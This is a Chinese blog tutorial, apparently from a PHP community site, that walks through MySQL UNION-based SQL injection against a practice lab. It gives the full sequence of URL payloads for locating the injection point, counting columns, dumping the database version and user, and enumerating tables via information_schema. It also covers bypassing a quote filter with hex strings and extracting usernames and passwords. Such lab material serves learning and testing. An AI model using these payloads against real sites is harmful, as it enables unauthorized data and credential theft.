首页
技术博客
PHP教程
数据库技术
前端开发
HTML5
Nginx
php论坛
新用户注册
|
会员登录
PHP教程
技术博客
编程问答
PNG素材
编程语言
前端技术
Android
PHP教程
HTML5教程
数据库
Linux技术
Nginx技术
PHP安全
WebSerer
职场攻略
JavaScript
开放平台
业界资讯
大话程序猿
登录
极速注册
取消
热门标签 | HotTags
object
php8
cookie
php
actionscrip
uml
subset
integer
iostream
数组
js
nodejs
hashcode
scala
javascript
list
dagger
cSharp
merge
vba
buffer
lua
audio
rsa
stream
bytecode
jsp
split
search
eval
keyword
require
import
case
md5
format
utf-8
include
instance
get
ip
range
match
python2
c语言
foreach
schema
export
controller
golang
chat
main
io
dll
heap
tags
hash
select
cmd
yaml
hashset
callback
string
spring
go
php5
version
python3
join
perl
httpclient
byte
frameworks
future
node.js
emoji
tree
filter
less
当前位置:
开发笔记
>
编程语言
> 正文
mysql联合注入
作者:xljlg | 来源:互联网 | 2023-07-21 13:08
mysql注入-联合查询靶场一、注入流程判断注入点判断注入点本身所查询表的字段数确定显示位查询数据库名,mysql版本,当前账户查询该数据库的所有表名查询表名所对应的所有字段名查询
mysql注入 - 联合查询靶场
一、注入流程
判断注入点
判断注入点本身所查询表的字段数
确定显示位
查询数据库名,mysql版本,当前账户
查询该数据库的所有表名
查询表名所对应的所有字段名
查询字段名对应的字段值
二、靶场演示
2.1 判断注入点
payload:
?id=1 and 1=2
?id=1 and 1=1
由下图我们可知,我们的代码成功的被执行,且为数字型注入
2.2 判断注入点本身所查询表的字段数
payload:
?id=1 order by 5
(页面返回正常)
?id=1 order by 6
(页面返回出错)
由下图我们可知,当前注入点所查询的表的字段数为5,这就要求我们在进行联合查询时,union关键字后面的select所查询的字段数应为:5
2.3 确定显示位
payload:
?id=1 union select 1,2,3,4,5
由下图我们可知,确定的显示位有:1,2,3 ,共3个
2.4 查询数据库名,mysql版本,当前账户
payload:
?id=1 union select database(),version(),user(),4,5
sql语句解释:
database(),version(),user(),均为mysql的内置函数,分别用于返回“当前查询语句所查询的数据库名”,“mysql数据库的版本”,“当前登录mysql数据库的用户”
由下图可知:
当前数据库为:hackyl
当前mysql数据库的版本为:5.0.51b-community-nt-log
mysql当前用户为:root@localhost
2.5 查询该数据库的所有表名
payload:
?id=1 union select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema='hackyl'
由下图可以得知,我们payload中的额单引号被过滤了,导致sql语句执行失败。
绕过单引号的payload:
?id=1 union select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=0x6861636B796C
这里我们将“hackyl”字符串转化为了十六进制,就不需要加单引号了,但是该语句仍然可以让mysql数据库进行执行。
由页面返回的结果可以看到,当前hackyl数据库拥有liuyan和user两种表,显然user表是我们所需要的。
2.6 查询表名所对应的所有字段名
payload:
?id=1 union select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x75736572
后面的 0x75736572 为“user”字符串的十六进制形式
由页面的返回结果可知,其中的“username”字段和“password”字段正是我们所需要的。
2.7 查询字段名对应的字段值
payload:
?id=1 union select group_concat(username),group_concat(password),3,4,5 from hackyl.user
由页面返回结果可以看出,user表中有三组账号密码,分别为:
hackyl/hacky,hacky2/hacky,hacky3/hacky
mysql
注入
数据库
编程
php
io
select
database
version
写下你的评论吧 !
吐个槽吧,看都看了
会员登录
|
用户注册
推荐阅读
sql
MacOS系统安装MySQL及设置MySQL服务开机启动和密码修改方法
本文介绍了在MacOS系统上安装MySQL的步骤,并详细说明了如何设置MySQL服务的开机启动和如何修改MySQL的密码。通过下载MySQL的macos版本并按照提示一步一步安装,在系统偏好设置中可以找到MySQL的图标进行设置。同时,还介绍了通过终端命令来修改MySQL的密码的具体操作步骤。 ...
[详细]
蜡笔小新 2023-12-11 17:35:39
js
如何限制php数据库链接数和连接超时时间?
本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ...
[详细]
蜡笔小新 2023-12-14 14:06:10
php
PHP设置MySQL字符集的方法及使用mysqli_set_charset函数
本文介绍了PHP设置MySQL字符集的方法,详细介绍了使用mysqli_set_charset函数来规定与数据库服务器进行数据传送时要使用的字符集。通过示例代码演示了如何设置默认客户端字符集。 ...
[详细]
蜡笔小新 2023-12-14 15:30:33
php
Oracle Database 10g许可授予信息及高级功能详解
本文介绍了Oracle Database 10g许可授予信息及其中的高级功能,包括数据库优化数据包、SQL访问指导、SQL优化指导、SQL优化集和重组对象。同时提供了详细说明,指导用户在Oracle Database 10g中如何使用这些功能。 ...
[详细]
蜡笔小新 2023-12-14 13:12:10
php
MysqlDump_mysqldump全库备份相关知识详解
本文详细介绍了MysqlDump和mysqldump进行全库备份的相关知识,包括备份命令的使用方法、my.cnf配置文件的设置、binlog日志的位置指定、增量恢复的方式以及适用于innodb引擎和myisam引擎的备份方法。对于需要进行数据库备份的用户来说,本文提供了一些有价值的参考内容。 ...
[详细]
蜡笔小新 2023-12-14 10:03:27
php
PHP中的MySQL函数库及其常用函数介绍
本文由编程笔记小编整理,介绍了PHP中的MySQL函数库及其常用函数,包括mysql_connect、mysql_error、mysql_select_db、mysql_query、mysql_affected_row、mysql_close等。希望对读者有一定的参考价值。 ...
[详细]
蜡笔小新 2023-12-14 08:19:53
stream
FileNotFoundException: File does not exist
ubuntu用sqoop将数据从hive导入mysql时,命令: ...
[详细]
蜡笔小新 2023-12-12 18:56:13
数组
如何在php中将mysql查询结果赋值给变量
本文介绍了在php中将mysql查询结果赋值给变量的方法,包括从mysql表中查询count(学号)并赋值给一个变量,以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法,并提供了示例代码。 ...
[详细]
蜡笔小新 2023-12-12 18:22:57
list
MyBatis多表查询与动态SQL使用
本文介绍了MyBatis多表查询与动态SQL的使用方法,包括一对一查询和一对多查询。同时还介绍了动态SQL的使用,包括if标签、trim标签、where标签、set标签和foreach标签的用法。文章还提供了相关的配置信息和示例代码。 ...
[详细]
蜡笔小新 2023-12-12 17:12:51
list
MySQL显示SQL语句执行时间的实例详解
本文详细介绍了如何使用MySQL来显示SQL语句的执行时间,并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法:瓶颈分析、工作负载分析和基于比率的分析。 ...
[详细]
蜡笔小新 2023-12-12 16:16:42
list
使用pymysql的Python无法向mysql数据库中的表添加字段
WhenIusepythontoapplythepymysqlmoduletoaddafieldtoatableinthemysqldatabase,itdo ...
[详细]
蜡笔小新 2023-12-12 13:45:10
object
使用 Ubuntu 中的 Python 获取浏览器历史记录
使用Ubuntu中的Python获取浏览器历史记录原文: ...
[详细]
蜡笔小新 2023-12-14 08:57:59
object
图解redis的持久化存储机制RDB和AOF的原理和优缺点
本文通过图解的方式介绍了redis的持久化存储机制RDB和AOF的原理和优缺点。RDB是将redis内存中的数据保存为快照文件,恢复速度较快但不支持拉链式快照。AOF是将操作日志保存到磁盘,实时存储数据但恢复速度较慢。文章详细分析了两种机制的优缺点,帮助读者更好地理解redis的持久化存储策略。 ...
[详细]
蜡笔小新 2023-12-13 20:24:11
object
基于事件驱动的并发编程及其消息通信机制的同步与异步、阻塞与非阻塞、IO模型的分类
本文介绍了基于事件驱动的并发编程中的消息通信机制,包括同步和异步的概念及其区别,阻塞和非阻塞的状态,以及IO模型的分类。同步阻塞IO、同步非阻塞IO、异步阻塞IO和异步非阻塞IO等不同的IO模型被详细解释。这些概念和模型对于理解并发编程中的消息通信和IO操作具有重要意义。 ...
[详细]
蜡笔小新 2023-12-13 19:32:09
php
Oracle分析函数first_value()和last_value()的用法及原理
本文介绍了Oracle分析函数first_value()和last_value()的用法和原理,以及在查询销售记录日期和部门中的应用。通过示例和解释,详细说明了first_value()和last_value()的功能和不同之处。同时,对于last_value()的结果出现不一样的情况进行了解释,并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ...
[详细]
蜡笔小新 2023-12-13 19:07:23
xljlg
这个家伙很懒,什么也没留下!
Tags | 热门标签
object
php8
cookie
php
actionscrip
uml
subset
integer
iostream
数组
js
nodejs
hashcode
scala
javascript
list
dagger
cSharp
merge
vba
buffer
lua
audio
rsa
stream
bytecode
jsp
split
search
eval
RankList | 热门文章
1
c语言程序设计习题6,C语言程序设计习题6.doc
2
【省选专题一】图论 jzoj 3936. 【GDOI2015模拟11.22】假期计划 spfa
3
做城市规划设计,如何下载地形图?
4
汉诺塔的java 实现(转)
5
2010年最新PHP类的精缩归纳【PHP】
6
如何模拟“按任意键继续?” - How to simulate “Press any key to continue?”
7
StormdeclareOutputFieldsdeclare
8
西安电子科技大学计算机研究生寝室,西安电子科技大学硕士宿舍身亡 生前说自己累...
9
使用多个隐藏层时神经网络的准确性非常差
10
如何在 WebAPI 中启用 CORS
11
怎样计算机翼升力大小,如何计算升力和阻力?
12
VS编译的程序在其他电脑上运行,不依赖VS相关运行环境
13
matlab 模拟滤波器转换为数字滤波器,模拟低通滤波器转换为数字高通滤波器.doc...
14
微信小程序 蓝牙打印机
15
02值类型
PHP1.CN | 中国最专业的PHP中文社区 |
DevBox开发工具箱
|
json解析格式化
|
PHP资讯
|
PHP教程
|
数据库技术
|
服务器技术
|
前端开发技术
|
PHP框架
|
开发工具
|
在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved |
京公网安备 11010802041100号
|
京ICP备19059560号-4
| PHP1.CN 第一PHP社区 版权所有